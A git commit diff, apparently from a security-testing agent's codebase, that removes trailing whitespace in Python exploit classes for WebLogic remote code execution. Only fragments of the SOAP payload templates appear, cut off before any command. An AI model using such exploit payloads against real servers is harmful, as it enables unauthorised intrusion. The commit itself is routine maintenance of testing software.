agent: Fix W291 trailing whitespace warnings

This commit is contained in:
Mike Salvatore 2021-04-07 13:49:37 -04:00
parent c9d64ea40c
commit 13d99a4ccc
1 changed files with 3 additions and 3 deletions

View File

@ -160,7 +160,7 @@ class WebLogic201710271(WebRCE):
:param command: command itself :param command: command itself
:return: Formatted payload :return: Formatted payload
""" """
empty_payload = """<soapenv:Envelope empty_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
@ -196,7 +196,7 @@ class WebLogic201710271(WebRCE):
:param port: Server's port :param port: Server's port
:return: Formatted payload :return: Formatted payload
""" """
generic_check_payload = """<soapenv:Envelope generic_check_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
@ -310,7 +310,7 @@ class WebLogic20192725(WebRCE):
""" """
empty_payload = """ empty_payload = """
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
<soapenv:Header> <soapenv:Header>
<wsa:Action>xx</wsa:Action> <wsa:Action>xx</wsa:Action>